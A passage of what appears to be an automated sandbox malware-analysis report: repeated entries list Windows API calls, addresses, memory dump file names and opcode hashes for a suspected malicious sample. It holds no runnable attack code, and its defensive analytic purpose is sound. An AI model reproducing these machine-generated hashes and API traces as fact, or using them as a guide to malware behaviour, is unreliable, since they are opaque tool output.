                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                        • String ID: p1Mw`KNw
                                                                        • API String ID: 3321077145-3626030660
                                                                        • Opcode ID: aea40cd1eac6cccf66703fcd836af22e13e84f9f87cf0199113912b25776cacd
                                                                        • Instruction ID: aae28c9f9e2bf3963186a909bdf7d7bd954ff63fc05fa6137cf1225290e8d505
                                                                        • Opcode Fuzzy Hash: aea40cd1eac6cccf66703fcd836af22e13e84f9f87cf0199113912b25776cacd
                                                                        • Instruction Fuzzy Hash: 3B412939600614DFCB11EF29C445A5DBBE5FF99710F198488EA46AB3A2DB30FC40CB91
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00950587
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharLower
                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                        • API String ID: 2358735015-567219261
                                                                        • Opcode ID: 737a18adda57ff5c0065e23e58fc7ed930ea665a998feb845d61a59df6d81c2c
                                                                        • Instruction ID: 907cc2ebe4cf7360ba9c50ae71fa42c42d0e6dcc464b61d7ae6410f3761d4468
                                                                        • Opcode Fuzzy Hash: 737a18adda57ff5c0065e23e58fc7ed930ea665a998feb845d61a59df6d81c2c
                                                                        • Instruction Fuzzy Hash: 9031A47060021AAFCF10EF69CD419FEB3B8FF95314B104A29E866A76D1DB71E915CB90
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0092B88E
                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0092B8A1
                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 0092B8D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        • Opcode ID: 7ea0eb9a895395e9d037cd2ccc7e997b5e2a84b8574fd71e3ffbd5651cde502c
                                                                        • Instruction ID: db8f5ba805dc0c4118ce83feeede5e733d2b2409ccaa21f54959822cd57be2ed
                                                                        • Opcode Fuzzy Hash: 7ea0eb9a895395e9d037cd2ccc7e997b5e2a84b8574fd71e3ffbd5651cde502c
                                                                        • Instruction Fuzzy Hash: 4B21E176900108AFDB14AB78EC86DBE77BCEF85364F104129F129A21E4DB784E0A9760
                                                                        APIs
                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00944401
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00944427
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00944457
                                                                        • InternetCloseHandle.WININET(00000000), ref: 0094449E
                                                                          • Part of subcall function 00945052: GetLastError.KERNEL32(?,?,009443CC,00000000,00000000,00000001), ref: 00945067
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                        • String ID:
                                                                        • API String ID: 1951874230-3916222277
                                                                        • Opcode ID: f0ee5377a4ed24c4bf6524999cbab1ffbb6564469f0c5622ece0978e463bc024
                                                                        • Instruction ID: 2581578f6f5cf83a337178d3d854b2eebe6ad1ec84e548437a199729dd539fdf
                                                                        • Opcode Fuzzy Hash: f0ee5377a4ed24c4bf6524999cbab1ffbb6564469f0c5622ece0978e463bc024
                                                                        • Instruction Fuzzy Hash: 37219FB6604608BFEB119FA4CC85FBFB6FCEF88798F10851AF109E2150EA648D459771
                                                                        APIs
                                                                          • Part of subcall function 0090D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0090D1BA
                                                                          • Part of subcall function 0090D17C: GetStockObject.GDI32(00000011), ref: 0090D1CE
                                                                          • Part of subcall function 0090D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0090D1D8
                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0095915C
                                                                        • LoadLibraryW.KERNEL32(?), ref: 00959163
                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00959178
                                                                        • DestroyWindow.USER32(?), ref: 00959180
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                        • String ID: SysAnimate32
                                                                        • API String ID: 4146253029-1011021900
                                                                        • Opcode ID: 750cf5d92ef50b706302a96ca047771b55683591ff15d5a80f2c45e08b73da10
                                                                        • Instruction ID: 970caea8b446ff3218e4cea47252071f041ca0cfd82c51464a379b900cbced13
                                                                        • Opcode Fuzzy Hash: 750cf5d92ef50b706302a96ca047771b55683591ff15d5a80f2c45e08b73da10
                                                                        • Instruction Fuzzy Hash: 60218E71218616FBFF108E669C88EBA37ADEF9A365F100618FD1492190C771DC45A760
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00939588
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009395B9
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 009395CB
                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00939605
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        • Opcode ID: 1c515bddaeb96886ff11b43de8b2ebd5cbed3c6290a227d94288096082933121
                                                                        • Instruction ID: c9304cf502b381b9122803bbed68fc87c2bc1924636bfe52a8fc489d625ba667
                                                                        • Opcode Fuzzy Hash: 1c515bddaeb96886ff11b43de8b2ebd5cbed3c6290a227d94288096082933121
                                                                        • Instruction Fuzzy Hash: BA219D71600205ABEB219F29DC05B9E7BF9AF85724F204A19FCA5D72E0D7B0D981DF20
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00939653
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00939683
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00939694
                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009396CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        • Opcode ID: 8fcfe9223c1ead394dbb447768ce44ba3bec00d2822732577f00fae0aed06eda
                                                                        • Instruction ID: ca1ce41d00f8bacbcbb7ef5e54b60eec4b31447707e1798151a231d65be54b3c
                                                                        • Opcode Fuzzy Hash: 8fcfe9223c1ead394dbb447768ce44ba3bec00d2822732577f00fae0aed06eda
                                                                        • Instruction Fuzzy Hash: BD214F716012059BDB209F699C46F9A77FCAF95728F200A19F8A1E72D0E7B09841CF50
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0093DB0A
                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0093DB5E
                                                                        • __swprintf.LIBCMT ref: 0093DB77
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0098DC00), ref: 0093DBB5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                        • String ID: %lu
                                                                        • API String ID: 3164766367-685833217
                                                                        • Opcode ID: f24fe51dcd3eec6a1a5e7736f73199fee896469c07cb2a2a50c02f2ee8af2735
                                                                        • Instruction ID: 0fb9edb708b6e0cfe1d306bfdef9d3884cb590a38d83dc4687ca4c29276bd361
                                                                        • Opcode Fuzzy Hash: f24fe51dcd3eec6a1a5e7736f73199fee896469c07cb2a2a50c02f2ee8af2735
                                                                        • Instruction Fuzzy Hash: 1F21533560010CAFCB10EF69DD85EAEBBB8EF89704B104069F609E7251DB71EA41DB61
                                                                        APIs
                                                                          • Part of subcall function 0092C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0092C84A
                                                                          • Part of subcall function 0092C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0092C85D
                                                                          • Part of subcall function 0092C82D: GetCurrentThreadId.KERNEL32 ref: 0092C864
                                                                          • Part of subcall function 0092C82D: AttachThreadInput.USER32(00000000), ref: 0092C86B
                                                                        • GetFocus.USER32 ref: 0092CA05
                                                                          • Part of subcall function 0092C876: GetParent.USER32(?), ref: 0092C884
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0092CA4E
                                                                        • EnumChildWindows.USER32(?,0092CAC4), ref: 0092CA76
                                                                        • __swprintf.LIBCMT ref: 0092CA90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                        • String ID: %s%d
                                                                        • API String ID: 3187004680-1110647743
                                                                        • Opcode ID: acf1dae1f4788ada953c9053cf1288270eb600fec52fccdcd02f952ed1c5f84e
                                                                        • Instruction ID: b744c72ced406ca4204dbeeee6f2b072e6b6a9ef2ea9d26d569bf1a94892f012
                                                                        • Opcode Fuzzy Hash: acf1dae1f4788ada953c9053cf1288270eb600fec52fccdcd02f952ed1c5f84e
                                                                        • Instruction Fuzzy Hash: A11184B16002197BCB11BF649C85FED377CAF94714F008066FE09AA186EB709545DB71
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009519F3
                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00951A26
                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00951B49
                                                                        • CloseHandle.KERNEL32(?), ref: 00951BBF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                        • String ID:
                                                                        • API String ID: 2364364464-0
                                                                        • Opcode ID: 7ccc7e26f78bb04e8b5921342b384d3e8a1decb0ca050741ae15f12ad305e6f7
                                                                        • Instruction ID: a3f3f1cbff646d73e5779820db730870777ebb3fd864059a6c89bc5edbbad115
                                                                        • Opcode Fuzzy Hash: 7ccc7e26f78bb04e8b5921342b384d3e8a1decb0ca050741ae15f12ad305e6f7
                                                                        • Instruction Fuzzy Hash: 41816E71600214AFDF10EF65C896BAEBBE9EF48720F148459F905AF3C2D7B4A9458B90
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0095E1D5
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0095E20D
                                                                        • IsDlgButtonChecked.USER32(?,00000001), ref: 0095E248
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0095E269
                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0095E281
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ButtonCheckedLongWindow
                                                                        • String ID:
                                                                        • API String ID: 3188977179-0
                                                                        • Opcode ID: 9ed8833ce9f26ca2773906db816e99be8581b3d25f0ebc7b606cadd7fbeeebcf
                                                                        • Instruction ID: 323fdec61c5d99840db0adc35decf58bae8a3c09ea984fd28d468bde2756b973
                                                                        • Opcode Fuzzy Hash: 9ed8833ce9f26ca2773906db816e99be8581b3d25f0ebc7b606cadd7fbeeebcf
                                                                        • Instruction Fuzzy Hash: 3E61C235A08604AFDB28CF6AC894FFA77BEEF89311F144059FD5997291C772AA44CB10
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 00931CB4
                                                                        • VariantClear.OLEAUT32(00000013), ref: 00931D26
                                                                        • VariantClear.OLEAUT32(00000000), ref: 00931D81
                                                                        • VariantClear.OLEAUT32(?), ref: 00931DF8
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00931E26
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                        • String ID:
                                                                        • API String ID: 4136290138-0
                                                                        • Opcode ID: 5a1bbf5c7989c641c20912d80beab9c5982bc54f214d74e38df9db2155dd29b9
                                                                        • Instruction ID: 7a7b678d9bb15f12ef822478877de22ce58b19b9a1837f8f3f7d838581c0c940
                                                                        • Opcode Fuzzy Hash: 5a1bbf5c7989c641c20912d80beab9c5982bc54f214d74e38df9db2155dd29b9
                                                                        • Instruction Fuzzy Hash: 455146B5A00209EFDB14CF58C880AAAB7B8FF8D314F158559E959DB350E730EA51CFA0
                                                                        APIs
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009506EE
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0095077D
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095079B
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 009507E1
                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 009507FB
                                                                          • Part of subcall function 0090E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0093A574,?,?,00000000,00000008), ref: 0090E675
                                                                          • Part of subcall function 0090E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0093A574,?,?,00000000,00000008), ref: 0090E699
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 327935632-0
                                                                        • Opcode ID: a54ba0161c8cf1918fb60619f2d660cf69cb88f537cc1240b5d5773ea1462b32
                                                                        • Instruction ID: 2594765b6a6d0b74b97a2bd8258b71e5c460f5682030ee95eeaf8058a990ba8a
                                                                        • Opcode Fuzzy Hash: a54ba0161c8cf1918fb60619f2d660cf69cb88f537cc1240b5d5773ea1462b32
                                                                        • Instruction Fuzzy Hash: 1B513876A00209DFCB00EFA8C895EADB7B5FF88310B148055EA55AB352DB31EE45CB81
                                                                        APIs
                                                                          • Part of subcall function 00953C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00952BB5,?,?), ref: 00953C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00952EEF
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00952F2E
                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00952F75
                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00952FA1
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00952FAE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                        • String ID:
                                                                        • API String ID: 3740051246-0
                                                                        • Opcode ID: 508d9168cc87cb3cb4d60ad7f762d40ff454dfa379c56c7a8c009f1b1b6c50f5
                                                                        • Instruction ID: 473f909e83b3d2e42f8ebef46050e19051ed18204acf76c5871c3df23cc4f3e8
                                                                        • Opcode Fuzzy Hash: 508d9168cc87cb3cb4d60ad7f762d40ff454dfa379c56c7a8c009f1b1b6c50f5
                                                                        • Instruction Fuzzy Hash: B9513C71208308AFD704EF69D981E6AB7F9FF89314F04891DFA9597291DB30E909CB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b2546acfa677cf0dfdcc91813c89730db40552bbb343148cc5a993db30bf7dc7
                                                                        • Instruction ID: 0d931d3b6eb54445c791d59e0a97144e55e617ec6ff0a030274b4f86ee60bd4b
                                                                        • Opcode Fuzzy Hash: b2546acfa677cf0dfdcc91813c89730db40552bbb343148cc5a993db30bf7dc7
                                                                        • Instruction Fuzzy Hash: 4D41C1BA905304AFC720DB69CC49FA9BB7CEB09321F140225ED59E72E1D734AD49DB90
                                                                        APIs
                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009412B4
                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009412DD
                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0094131C
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00941341
                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00941349
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 1389676194-0
                                                                        • Opcode ID: 914c213bfd94cb6c4588e82596090f4bc2032729cf4ac322dd5b09570f43b8bd
